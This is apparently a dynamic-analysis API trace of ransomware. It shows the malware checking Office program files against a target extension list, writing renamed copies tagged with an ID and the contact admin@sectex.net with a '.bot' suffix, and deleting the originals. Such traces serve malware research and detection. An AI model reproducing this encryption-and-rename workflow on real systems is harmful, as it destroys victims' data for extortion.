	[0154.344] lstrlenW (lpString=".dbf") returned 4
	[0154.344] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.344] lstrlenW (lpString=".1cd") returned 4
	[0154.345] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.345] lstrlenW (lpString=".jpg") returned 4
	[0154.345] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.345] lstrlenW (lpString=".doc") returned 4
	[0154.345] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString=".docx") returned 5
	[0154.345] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0154.345] lstrlenW (lpString=".pdf") returned 4
	[0154.345] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString=".xls") returned 4
	[0154.345] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString=".xlsx") returned 5
	[0154.345] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0154.345] lstrlenW (lpString=".ppt") returned 4
	[0154.345] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.345] lstrlenW (lpString=".zip") returned 4
	[0154.345] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString=".rar") returned 4
	[0154.345] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.345] lstrlenW (lpString=".bz2") returned 4
	[0154.345] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.345] lstrlenW (lpString=".7z") returned 3
	[0154.345] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.345] lstrlenW (lpString=".dbf") returned 4
	[0154.345] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.346] lstrlenW (lpString=".1cd") returned 4
	[0154.346] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.346] lstrlenW (lpString=".jpg") returned 4
	[0154.346] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.346] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0154.346] lstrlenW (lpString="XLSLICER.DLL.IDX_DLL") returned 20
	[0154.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0154.448] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=12672) returned 1
	[0154.448] CloseHandle (hObject=0x3d0) returned 1
	[0154.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.idx_dll")) returned 0x20
	[0154.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0154.812] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.812] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.813] GetLastError () returned 0x0
	[0154.813] ReadFile (in: hFile=0x39c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x3180, lpOverlapped=0x0) returned 1
	[0154.944] WriteFile (in: hFile=0x3dc, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x3190, lpOverlapped=0x0) returned 1
	[0154.945] ReadFile (in: hFile=0x39c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.945] WriteFile (in: hFile=0x3dc, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0154.945] SetEndOfFile (hFile=0x3dc) returned 1
	[0155.479] CloseHandle (hObject=0x3dc) returned 1
	[0155.479] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.480] SetEndOfFile (hFile=0x39c) returned 1
	[0155.744] CloseHandle (hObject=0x39c) returned 1
	[0155.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.idx_dll")) returned 1
	[0155.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.785] lstrlenW (lpString=".doc") returned 4
	[0155.785] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0155.785] lstrlenW (lpString=".docx") returned 5
	[0155.785] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0155.785] lstrlenW (lpString=".pdf") returned 4
	[0155.785] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString=".xls") returned 4
	[0155.786] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString=".xlsx") returned 5
	[0155.786] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0155.786] lstrlenW (lpString=".ppt") returned 4
	[0155.786] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.786] lstrlenW (lpString=".zip") returned 4
	[0155.786] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString=".rar") returned 4
	[0155.786] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString=".bz2") returned 4
	[0155.786] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString=".7z") returned 3
	[0155.786] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.786] lstrlenW (lpString=".dbf") returned 4
	[0155.786] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.786] lstrlenW (lpString=".1cd") returned 4
	[0155.786] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.786] lstrlenW (lpString=".jpg") returned 4
	[0155.786] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.786] lstrlenW (lpString=".doc") returned 4
	[0155.786] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0155.786] lstrlenW (lpString=".docx") returned 5
	[0155.786] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0155.787] lstrlenW (lpString=".pdf") returned 4
	[0155.787] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString=".xls") returned 4
	[0155.787] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString=".xlsx") returned 5
	[0155.787] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0155.787] lstrlenW (lpString=".ppt") returned 4
	[0155.787] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.787] lstrlenW (lpString=".zip") returned 4
	[0155.787] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString=".rar") returned 4
	[0155.787] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString=".bz2") returned 4
	[0155.787] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString=".7z") returned 3
	[0155.787] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.787] lstrlenW (lpString=".dbf") returned 4
	[0155.787] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.787] lstrlenW (lpString=".1cd") returned 4
	[0155.787] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0155.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.IDX_DLL") returned 68
	[0155.787] lstrlenW (lpString=".jpg") returned 4
	[0155.787] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0155.787] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.787] lstrlenW (lpString="ACCDDSLM.DLL") returned 12
	[0155.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.791] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=552368) returned 1
	[0155.791] CloseHandle (hObject=0x3b0) returned 1
	[0155.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll")) returned 0x20
	[0155.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddslm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.807] lstrlenW (lpString=".doc") returned 4
	[0155.807] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.807] lstrlenW (lpString=".docx") returned 5
	[0155.807] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0155.807] lstrlenW (lpString=".pdf") returned 4
	[0155.807] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.807] lstrlenW (lpString=".xls") returned 4
	[0155.807] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.807] lstrlenW (lpString=".xlsx") returned 5
	[0155.807] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0155.807] lstrlenW (lpString=".ppt") returned 4
	[0155.807] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.807] lstrlenW (lpString=".zip") returned 4
	[0155.807] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.807] lstrlenW (lpString=".rar") returned 4
	[0155.807] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.807] lstrlenW (lpString=".bz2") returned 4
	[0155.807] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.807] lstrlenW (lpString=".7z") returned 3
	[0155.807] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.808] lstrlenW (lpString=".dbf") returned 4
	[0155.808] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.808] lstrlenW (lpString=".1cd") returned 4
	[0155.808] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.808] lstrlenW (lpString=".jpg") returned 4
	[0155.808] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.808] lstrlenW (lpString=".doc") returned 4
	[0155.808] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString=".docx") returned 5
	[0155.808] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0155.808] lstrlenW (lpString=".pdf") returned 4
	[0155.808] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString=".xls") returned 4
	[0155.808] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString=".xlsx") returned 5
	[0155.808] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0155.808] lstrlenW (lpString=".ppt") returned 4
	[0155.808] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.808] lstrlenW (lpString=".zip") returned 4
	[0155.808] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString=".rar") returned 4
	[0155.808] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.808] lstrlenW (lpString=".bz2") returned 4
	[0155.808] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.808] lstrlenW (lpString=".7z") returned 3
	[0155.808] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.809] lstrlenW (lpString=".dbf") returned 4
	[0155.809] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.809] lstrlenW (lpString=".1cd") returned 4
	[0155.809] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSLM.DLL") returned 55
	[0155.809] lstrlenW (lpString=".jpg") returned 4
	[0155.809] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.809] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0155.809] lstrlenW (lpString="ACCICONS.EXE") returned 12
	[0155.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\accicons.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.810] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1449312) returned 1
	[0155.810] CloseHandle (hObject=0x3ac) returned 1
	[0155.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\accicons.exe")) returned 0x20
	[0155.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accicons.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\accicons.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.810] lstrlenW (lpString=".doc") returned 4
	[0155.810] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0155.810] lstrlenW (lpString=".docx") returned 5
	[0155.810] lstrcmpiW (lpString1=".docx", lpString2="S.EXE") returned -1
	[0155.810] lstrlenW (lpString=".pdf") returned 4
	[0155.810] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0155.810] lstrlenW (lpString=".xls") returned 4
	[0155.810] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0155.810] lstrlenW (lpString=".xlsx") returned 5
	[0155.810] lstrcmpiW (lpString1=".xlsx", lpString2="S.EXE") returned -1
	[0155.810] lstrlenW (lpString=".ppt") returned 4
	[0155.810] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0155.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.811] lstrlenW (lpString=".zip") returned 4
	[0155.811] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0155.811] lstrlenW (lpString=".rar") returned 4
	[0155.811] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0155.811] lstrlenW (lpString=".bz2") returned 4
	[0155.811] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0155.811] lstrlenW (lpString=".7z") returned 3
	[0155.811] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0155.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.811] lstrlenW (lpString=".dbf") returned 4
	[0155.811] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0155.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.811] lstrlenW (lpString=".1cd") returned 4
	[0155.811] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0155.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.811] lstrlenW (lpString=".jpg") returned 4
	[0155.811] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0155.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.811] lstrlenW (lpString=".doc") returned 4
	[0155.811] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0155.811] lstrlenW (lpString=".docx") returned 5
	[0155.811] lstrcmpiW (lpString1=".docx", lpString2="S.EXE") returned -1
	[0155.811] lstrlenW (lpString=".pdf") returned 4
	[0155.811] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0155.811] lstrlenW (lpString=".xls") returned 4
	[0155.811] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0155.811] lstrlenW (lpString=".xlsx") returned 5
	[0155.811] lstrcmpiW (lpString1=".xlsx", lpString2="S.EXE") returned -1
	[0155.811] lstrlenW (lpString=".ppt") returned 4
	[0155.812] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0155.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.812] lstrlenW (lpString=".zip") returned 4
	[0155.812] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0155.812] lstrlenW (lpString=".rar") returned 4
	[0155.812] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0155.812] lstrlenW (lpString=".bz2") returned 4
	[0155.812] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0155.812] lstrlenW (lpString=".7z") returned 3
	[0155.812] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0155.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.812] lstrlenW (lpString=".dbf") returned 4
	[0155.812] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0155.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.812] lstrlenW (lpString=".1cd") returned 4
	[0155.812] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0155.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCICONS.EXE") returned 55
	[0155.812] lstrlenW (lpString=".jpg") returned 4
	[0155.812] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0155.812] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.812] lstrlenW (lpString="ACCVDT.DLL") returned 10
	[0155.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accvdt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.813] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=4532616) returned 1
	[0155.813] CloseHandle (hObject=0x3ac) returned 1
	[0155.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accvdt.dll")) returned 0x20
	[0155.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accvdt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.813] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accvdt.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accvdt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0155.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.813] lstrlenW (lpString=".doc") returned 4
	[0155.813] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.813] lstrlenW (lpString=".docx") returned 5
	[0155.813] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0155.814] lstrlenW (lpString=".pdf") returned 4
	[0155.814] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString=".xls") returned 4
	[0155.814] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString=".xlsx") returned 5
	[0155.814] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0155.814] lstrlenW (lpString=".ppt") returned 4
	[0155.814] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.814] lstrlenW (lpString=".zip") returned 4
	[0155.814] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString=".rar") returned 4
	[0155.814] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString=".bz2") returned 4
	[0155.814] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.814] lstrlenW (lpString=".7z") returned 3
	[0155.814] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.814] lstrlenW (lpString=".dbf") returned 4
	[0155.814] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
